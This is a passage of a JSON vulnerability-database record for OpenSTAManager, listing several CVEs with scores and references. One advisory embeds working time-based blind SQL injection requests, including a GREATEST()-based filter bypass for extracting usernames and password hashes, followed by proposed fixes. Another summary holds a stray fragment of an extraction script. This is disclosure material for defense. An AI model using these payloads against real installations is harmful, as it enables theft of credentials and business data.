], "url": "https://github.com/devcode-it/openstamanager" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24417", "reference_id": "CVE-2026-24417", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24417" }, { "reference_url": "https://github.com/advisories/GHSA-4hc4-8599-xh2h", "reference_id": "GHSA-4hc4-8599-xh2h", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-4hc4-8599-xh2h" }, { "reference_url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-4hc4-8599-xh2h", "reference_id": "GHSA-4hc4-8599-xh2h", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-02-06T18:55:27Z/" } ], "url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-4hc4-8599-xh2h" } ], "fixed_packages": [], "aliases": [ "CVE-2026-24417", "GHSA-4hc4-8599-xh2h" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-nzzy-h46k-bfcr" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/50041?format=api", "vulnerability_id": "VCID-pxzr-bvsj-y3gs", "summary": "OpenSTAManager has a SQL Injection in ajax_select.php (componenti endpoint)\nA SQL Injection vulnerability exists in the `ajax_select.php` endpoint when 
handling the `componenti` operation. An authenticated attacker can inject malicious SQL code through the `options[matricola]` parameter.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-69214", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00017", "scoring_system": "epss", "scoring_elements": "0.04208", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00017", "scoring_system": "epss", "scoring_elements": "0.04219", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00017", "scoring_system": "epss", "scoring_elements": "0.0422", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.05507", "published_at": "2026-06-08T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-69214" }, { "reference_url": "https://github.com/devcode-it/openstamanager", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/devcode-it/openstamanager" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69214", "reference_id": "CVE-2025-69214", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69214" }, { "reference_url": "https://github.com/advisories/GHSA-qjv8-63xq-gq8m", "reference_id": "GHSA-qjv8-63xq-gq8m", 
"reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-qjv8-63xq-gq8m" }, { "reference_url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-qjv8-63xq-gq8m", "reference_id": "GHSA-qjv8-63xq-gq8m", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-02-09T15:20:52Z/" } ], "url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-qjv8-63xq-gq8m" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/958981?format=api", "purl": "pkg:composer/devcode-it/openstamanager@2.10-beta", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-5srf-wjj5-z3fj" }, { "vulnerability": "VCID-5tn6-au4e-33de" }, { "vulnerability": "VCID-e7y7-21j6-k7hj" }, { "vulnerability": "VCID-nzzy-h46k-bfcr" }, { "vulnerability": "VCID-uq8m-y1hg-qbgx" }, { "vulnerability": "VCID-y85c-bbqe-r3bt" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/devcode-it/openstamanager@2.10-beta" } ], "aliases": [ "CVE-2025-69214", "GHSA-qjv8-63xq-gq8m" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-pxzr-bvsj-y3gs" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/95071?format=api", "vulnerability_id": "VCID-uq8m-y1hg-qbgx", "summary": "OpenSTAManager contains an arbitrary file upload 
vulnerability in its module update functionality\nOpenSTAManager versions 2.10 and earlier contain an arbitrary file upload vulnerability in the module update functionality (modules/aggiornamenti/upload_modules.php).", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-38751", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00056", "scoring_system": "epss", "scoring_elements": "0.17849", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00056", "scoring_system": "epss", "scoring_elements": "0.17735", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.00056", "scoring_system": "epss", "scoring_elements": "0.17811", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00056", "scoring_system": "epss", "scoring_elements": "0.17845", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-38751" }, { "reference_url": "https://github.com/devcode-it/openstamanager", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-05T13:15:57Z/" } ], "url": "https://github.com/devcode-it/openstamanager" }, { "reference_url": "https://github.com/fuutianyii/poc", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-05T13:15:57Z/" } ], "url": "https://github.com/fuutianyii/poc" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-38751", "reference_id": 
"", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-38751" }, { "reference_url": "https://github.com/advisories/GHSA-rm34-fg4m-39mw", "reference_id": "GHSA-rm34-fg4m-39mw", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-rm34-fg4m-39mw" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1006110?format=api", "purl": "pkg:composer/devcode-it/openstamanager@2.10.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-5srf-wjj5-z3fj" }, { "vulnerability": "VCID-5tn6-au4e-33de" }, { "vulnerability": "VCID-e7y7-21j6-k7hj" }, { "vulnerability": "VCID-y85c-bbqe-r3bt" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/devcode-it/openstamanager@2.10.1" } ], "aliases": [ "CVE-2026-38751", "GHSA-rm34-fg4m-39mw" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-uq8m-y1hg-qbgx" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/49976?format=api", "vulnerability_id": "VCID-w4gk-vbbq-13ea", "summary": "OpenSTAManager has an SQL Injection in the Stampe Module\nprint(\"=\"*70)\nprint(\" EXTRACTION SUMMARY\")\nprint(\"=\"*70)\nprint()\n\nif results:\nfor key, value in results.items():\nprint(f\" {key:.<40} {value}\")", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-69215", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00043", "scoring_system": "epss", "scoring_elements": "0.13534", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00055", "scoring_system": "epss", "scoring_elements": 
"0.17565", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.00055", "scoring_system": "epss", "scoring_elements": "0.17644", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00055", "scoring_system": "epss", "scoring_elements": "0.17676", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-69215" }, { "reference_url": "https://github.com/devcode-it/openstamanager", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/devcode-it/openstamanager" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69215", "reference_id": "CVE-2025-69215", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69215" }, { "reference_url": "https://github.com/advisories/GHSA-qx9p-w3vj-q24q", "reference_id": "GHSA-qx9p-w3vj-q24q", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-qx9p-w3vj-q24q" }, { "reference_url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-qx9p-w3vj-q24q", "reference_id": "GHSA-qx9p-w3vj-q24q", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", 
"scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-02-04T19:31:22Z/" } ], "url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-qx9p-w3vj-q24q" } ], "fixed_packages": [], "aliases": [ "CVE-2025-69215", "GHSA-qx9p-w3vj-q24q" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-w4gk-vbbq-13ea" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89415?format=api", "vulnerability_id": "VCID-y85c-bbqe-r3bt", "summary": "OpenSTAManager has a Time-Based Blind SQL Injection via `options[stato]` Parameter\n## Description\n\nMultiple AJAX select handlers in OpenSTAManager <= 2.10.1 are vulnerable to Time-Based Blind SQL Injection through the `options[stato]` GET parameter. The user-supplied value is read from `$superselect['stato']` and concatenated directly into SQL WHERE clauses as a bare expression, without any sanitization, parameterization, or allowlist validation.\n\nAn authenticated attacker can inject arbitrary SQL statements to extract sensitive data from the database, including usernames, password hashes, financial records, and any other information stored in the MySQL database.\n\n## Affected Endpoints\n\nThree modules share the same vulnerability pattern:\n\n### 1. Preventivi (Quotes) - Primary\n\n- **Endpoint:** `GET /ajax_select.php?op=preventivi`\n- **File:** `modules/preventivi/ajax/select.php`, line 60\n- **Required parameters:** `options[idanagrafica]` (any valid ID)\n\n**Vulnerable code:**\n\n```php\n// modules/preventivi/ajax/select.php, lines 59-60\n$stato = !empty($superselect['stato']) ? $superselect['stato'] : 'is_pianificabile';\n$where[] = '('.$stato.' = 1)';\n```\n\nThe `$stato` variable is inserted as a bare expression inside parentheses. The resulting SQL fragment becomes `({user_input} = 1)`, allowing an attacker to break out of the expression and inject arbitrary SQL.\n\n### 2. 
Ordini (Orders)\n\n- **Endpoint:** `GET /ajax_select.php?op=ordini-cliente`\n- **File:** `modules/ordini/ajax/select.php`, line 52\n- **Required parameters:** `options[idanagrafica]` (any valid ID)\n\n**Vulnerable code:**\n\n```php\n// modules/ordini/ajax/select.php, lines 51-52\n$stato = !empty($superselect['stato']) ? $superselect['stato'] : 'is_fatturabile';\n$where[] = '`or_statiordine`.'.$stato.' = 1';\n```\n\nThe `$stato` variable is inserted as a column name reference. The resulting SQL fragment becomes `` `or_statiordine`.{user_input} = 1 ``, allowing injection after the table-column reference.\n\n### 3. Contratti (Contracts)\n\n- **Endpoint:** `GET /ajax_select.php?op=contratti`\n- **File:** `modules/contratti/ajax/select.php`, line 57\n- **Required parameters:** `options[idanagrafica]` (any valid ID)\n\n**Vulnerable code:**\n\n```php\n// modules/contratti/ajax/select.php, lines 56-57\n$stato = !empty($superselect['stato']) ? $superselect['stato'] : 'is_pianificabile';\n$where[] = '`idstato` IN (SELECT `id` FROM `co_staticontratti` WHERE '.$stato.' = 1)';\n```\n\nThe `$stato` variable is inserted inside a subquery. The resulting SQL fragment becomes `WHERE {user_input} = 1)`, allowing an attacker to close the subquery and inject into the outer query.\n\n## Root Cause Analysis\n\n### Data Flow\n\n1. The attacker sends a GET request with `options[stato]=<payload>` to `/ajax_select.php`\n2. `ajax_select.php` (line 30) reads the value via `filter('options')`, which applies HTMLPurifier sanitization\n3. HTMLPurifier strips HTML tags and the `>` character, but does **NOT** strip SQL keywords (`SELECT`, `SLEEP`, `IF`, `UNION`, etc.) or SQL-significant characters (`(`, `)`, `=`, `'`, etc.)\n4. The sanitized value is passed to `AJAX::select()` in `src/AJAX.php` (line 40)\n5. `AJAX::getSelectResults()` assigns `$superselect = $options` (line 273) and `require`s the module's `select.php` file (line 275)\n6. 
The module's `select.php` reads `$superselect['stato']` and concatenates it directly into the `$where[]` array\n7. `AJAX::selectResults()` joins all WHERE elements with `AND` and executes the query via `Query::executeAndCount()` (line 120)\n\n### Why HTMLPurifier is Insufficient\n\nHTMLPurifier is an HTML sanitization library designed to prevent XSS attacks. It is **not** an SQL injection prevention mechanism. Specifically:\n\n- It does **not** strip SQL keywords: `SELECT`, `SLEEP`, `IF`, `UNION`, `FROM`, `WHERE`\n- It does **not** strip SQL operators: `=`, `(`, `)`, `,`, `+`, `-`, `*`\n- It strips the `>` character (used in HTML), which can be bypassed using MySQL's `GREATEST()` function\n- It provides zero protection against SQL injection\n\n## Proof of Concept\n\n### Prerequisites\n\n- A valid user account on the OpenSTAManager instance (any privilege level)\n- Network access to the application\n\n### Step 1: Authenticate\n\n```\nPOST /index.php HTTP/1.1\nHost: <target>\nContent-Type: application/x-www-form-urlencoded\n\nop=login&username=<user>&password=<pass>\n```\n\nSave the `PHPSESSID` cookie from the `Set-Cookie` response header.\n\n### Step 2: Verify Injection (SLEEP test)\n\n**Baseline request** (normal response time ~200ms):\n\n```\nGET /ajax_select.php?op=preventivi&options[idanagrafica]=1&options[stato]=is_pianificabile HTTP/1.1\nHost: <target>\nCookie: PHPSESSID=<session>\n```\n\n**Injection request** (response time ~10 seconds):\n\n```\nGET /ajax_select.php?op=preventivi&options[idanagrafica]=1&options[stato]=1)+AND+(SELECT+1+FROM+(SELECT(SLEEP(10)))a)+AND+(1 HTTP/1.1\nHost: <target>\nCookie: PHPSESSID=<session>\n```\n\n**Expected result:** The response is delayed by approximately 10 seconds, confirming that the `SLEEP(10)` function was executed by the database server. 
The response body in both cases is identical: `{\"results\":[],\"recordsFiltered\":0}`.\n\n<img width=\"934\" height=\"491\" alt=\"image\" src=\"https://github.com/user-attachments/assets/27beff84-3e25-43e1-b484-76db25c0faa8\" />\n\n\n### Step 3: Data Extraction (demonstrating impact)\n\nUsing binary search with time-based boolean conditions, an attacker can extract arbitrary data. The `>` character is stripped by HTMLPurifier, so the `GREATEST()` function is used as an equivalent:\n\n**Extract username length:**\n\n```\nGET /ajax_select.php?op=preventivi&options[idanagrafica]=1&options[stato]=1)+AND+(SELECT+1+FROM+(SELECT(IF((GREATEST(LENGTH((SELECT+username+FROM+zz_users+LIMIT+0,1)),3%2B1)%3DLENGTH((SELECT+username+FROM+zz_users+LIMIT+0,1))),SLEEP(2),0)))a)+AND+(1 HTTP/1.1\n```\n\nThis technique was used to successfully extract:\n\n- **Username:** `admin` (5 characters, extracted character by character)\n- **Password hash prefix:** `$2y$10$qAo04wNbhR9cpxjHzrtcnu...` (bcrypt)\n- **MySQL version:** `8.3.0`\n\n### PoC for Other Endpoints\n\n**Ordini (orders):**\n\n```\nGET /ajax_select.php?op=ordini-cliente&options[idanagrafica]=1&options[stato]=is_fatturabile+%3D+1+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))a)+AND+1 HTTP/1.1\n```\n\n**Contratti (contracts):**\n\n```\nGET /ajax_select.php?op=contratti&options[idanagrafica]=1&options[stato]=1)+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))a)+AND+(1 HTTP/1.1\n```\n\nBoth endpoints show the same SLEEP-based timing delay, confirming the injection.\n\n## Impact\n\n- **Confidentiality:** An attacker can extract the entire database contents, including user credentials (usernames and bcrypt password hashes), personally identifiable information (PII), financial records (invoices, quotes, contracts, payments), and application configuration.\n- **Integrity:** With MySQL's `INSERT`/`UPDATE` capabilities via subqueries, an attacker may be able to modify data.\n- **Availability:** An attacker can execute `SLEEP()` with large values or 
resource-intensive queries to cause denial of service.\n\n## Proposed Remediation\n\n### Option A: Allowlist Validation (Recommended)\n\nReplace the direct concatenation with an allowlist of permitted column names:\n\n```php\n// modules/preventivi/ajax/select.php — FIXED\n$allowed_stati = ['is_pianificabile', 'is_completato', 'is_fatturabile', 'is_concluso'];\n$stato = !empty($superselect['stato']) && in_array($superselect['stato'], $allowed_stati)\n ? $superselect['stato']\n : 'is_pianificabile';\n$where[] = '('.$stato.' = 1)';\n```\n\n```php\n// modules/ordini/ajax/select.php — FIXED\n$allowed_stati = ['is_fatturabile', 'is_evadibile', 'is_completato'];\n$stato = !empty($superselect['stato']) && in_array($superselect['stato'], $allowed_stati)\n ? $superselect['stato']\n : 'is_fatturabile';\n$where[] = '`or_statiordine`.'.$stato.' = 1';\n```\n\n```php\n// modules/contratti/ajax/select.php — FIXED\n$allowed_stati = ['is_pianificabile', 'is_completato', 'is_fatturabile'];\n$stato = !empty($superselect['stato']) && in_array($superselect['stato'], $allowed_stati)\n ? $superselect['stato']\n : 'is_pianificabile';\n$where[] = '`idstato` IN (SELECT `id` FROM `co_staticontratti` WHERE '.$stato.' = 1)';\n```\n\nThis approach is recommended because the `stato` parameter represents a database column name (not a value), so prepared statements cannot be used here. The allowlist ensures only known-safe column names are accepted.\n\n### Option B: Regex Validation (Alternative)\n\nIf the set of column names is dynamic, validate the format strictly:\n\n```php\n$stato = !empty($superselect['stato']) ? $superselect['stato'] : 'is_pianificabile';\nif (!preg_match('/^[a-z_]+$/i', $stato)) {\n $stato = 'is_pianificabile'; // fallback to safe default\n}\n$where[] = '('.$stato.' 
= 1)';\n```\n\nThis ensures only alphabetic characters and underscores are accepted, preventing any SQL injection.\n\n### Option C: Backtick Quoting (Supplementary)\n\nIn addition to validation, wrap the column name in backticks to treat it as an identifier:\n\n```php\n$where[] = '(`'.str_replace('`', '', $stato).'` = 1)';\n```\n\n**Note:** This alone is insufficient without input validation but provides defense-in-depth.\n\n### Global Recommendation\n\nAudit all usages of `$superselect` across the codebase. Any value from `$superselect` that is used as part of a SQL expression (not as a parameterized value) must be validated against an allowlist. The `prepare()` function is already used correctly in other parts of the code — the issue is specifically where `$superselect` values are used as column names or bare expressions.\n\n### Credits\nOmar Ramirez", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-28805", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00015", "scoring_system": "epss", "scoring_elements": "0.03098", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00015", "scoring_system": "epss", "scoring_elements": "0.03029", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.00015", "scoring_system": "epss", "scoring_elements": "0.03047", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00015", "scoring_system": "epss", "scoring_elements": "0.03088", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-28805" }, { "reference_url": "https://github.com/devcode-it/openstamanager", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/devcode-it/openstamanager" }, { "reference_url": 
"https://github.com/devcode-it/openstamanager/commit/50b9089c506ba2ca249afb1dfead2af5d42c10e7", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-02T18:30:58Z/" } ], "url": "https://github.com/devcode-it/openstamanager/commit/50b9089c506ba2ca249afb1dfead2af5d42c10e7" }, { "reference_url": "https://github.com/devcode-it/openstamanager/commit/679c40fa5b3acad4263b537f367c0695ff9666dc", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-02T18:30:58Z/" } ], "url": "https://github.com/devcode-it/openstamanager/commit/679c40fa5b3acad4263b537f367c0695ff9666dc" }, { "reference_url": "https://github.com/devcode-it/openstamanager/releases/tag/v2.10.2", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-02T18:30:58Z/" } ], "url": "https://github.com/devcode-it/openstamanager/releases/tag/v2.10.2" }, { "reference_url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-3gw8-3mg3-jmpc", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": 
"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-02T18:30:58Z/" } ], "url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-3gw8-3mg3-jmpc" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28805", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28805" }, { "reference_url": "https://github.com/advisories/GHSA-3gw8-3mg3-jmpc", "reference_id": "GHSA-3gw8-3mg3-jmpc", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-3gw8-3mg3-jmpc" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/110583?format=api", "purl": "pkg:composer/devcode-it/openstamanager@2.10.2", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/devcode-it/openstamanager@2.10.2" } ], "aliases": [ "CVE-2026-28805", "GHSA-3gw8-3mg3-jmpc" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-y85c-bbqe-r3bt" } ], "fixing_vulnerabilities": [], "risk_score": "4.5", "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/devcode-it/openstamanager@2.4.25" }